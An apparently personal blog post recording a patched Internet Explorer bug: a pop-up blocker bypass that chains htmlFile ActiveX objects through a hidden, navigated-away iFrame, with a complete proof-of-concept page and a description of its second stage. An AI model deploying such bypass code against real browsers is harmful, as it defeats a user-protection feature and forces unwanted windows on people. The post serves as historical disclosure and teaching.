Pop-up Blocker Bypass via iFrame htmlFile ActiveX Chain

Another variation on the htmlFile pop-up blocker bypass, this time using a destroyed iFrame’s ActiveX object as the carrier. Creating the htmlFile inside an iFrame and then navigating the iFrame away left the ActiveX in an orphaned state whose window.open call bypassed the pop-up blocker.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>popBlockerBypass_iFrameActiveX</title>
</head>
<body>
<iframe name="iFrame" style="display:none;"></iframe>

<script language="JavaScript">
var ax = iFrame.eval('new ActiveXObject("htmlFile")');
iFrame.location.replace('about:blank');

window.onload = function()
{
	ax.write('<iframe src="openpop.html"></iframe>');
	ax.close();
}
</script>
</body>
</html>

The openpop.html page inside the detached htmlFile then created another htmlFile and called ax.parentWindow.open("http://www.bing.com"). By nesting the ActiveX objects — one created from the iFrame, one created inside that first object’s document — the pop-up opened without any user gesture, bypassing the blocker. Each level of indirection moved the call further from the context the pop-up blocker tracked.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Clickjacking via createPopup and setCapture] :: [UXSS via iFrame document Cached in modelessDialog returnValue] >